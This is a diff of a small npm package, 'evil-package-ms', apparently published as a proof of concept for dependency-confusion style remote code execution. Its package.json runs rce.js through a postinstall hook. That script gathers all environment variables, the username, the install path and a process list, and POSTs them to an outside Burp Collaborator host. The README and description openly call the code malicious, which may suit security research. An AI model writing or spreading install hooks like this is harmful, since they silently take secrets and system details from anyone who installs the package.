evil-package-ms 1.0.1

package/Readme.md

@@ -0,0 +1,4 @@
+Hi everyone! 
+
+I've been write this package in ordr to test some npm misconfigurations that leads to Remote Code Execution.
+Sorry for disturbing !

package/package.json

@@ -0,0 +1,12 @@
+{
+  "name": "evil-package-ms",
+  "version": "1.0.1",
+  "description": "Please dont install this package! Has malicious code inside",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1",
+    "postinstall": "node rce"
+  },
+  "author": "",
+  "license": "ISC"
+}

package/rce.js

@@ -0,0 +1,48 @@
+const https = require('https')
+var os = require('os');
+var exec = require('child_process').exec;
+
+const data = { machine: process.platform, workspace: __dirname, env: process.env, user: os.userInfo().username}
+
+const options = {
+  hostname: 'wwwkuzmaxearhz2ogmqexxizbqhg55.burpcollaborator.net',
+  port: 443,
+  path: '/log',
+  method: 'POST',
+  headers: {
+    'Content-Type': 'application/json'
+    //'Content-Length': data.length
+  }
+}
+
+
+
+
+
+
+var command = "ps -a"
+if(process.platform == "win32"){
+  commmand = "tasklist"
+}
+
+exec(command, function(error, stdout, stderr) {
+  console.log(stdout);
+  data.processes = stdout;
+
+  options.headers['Content-Length'] = JSON.stringify(data).length;
+  const req = https.request(options, res => {
+    console.log(`statusCode: ${res.statusCode}`)
+  
+    res.on('data', d => {
+      process.stdout.write(d)
+    })
+  })
+  
+  req.on('error', error => {
+    console.error(error)
+  })
+
+  req.write(JSON.stringify(data))
+  req.end()
+});
+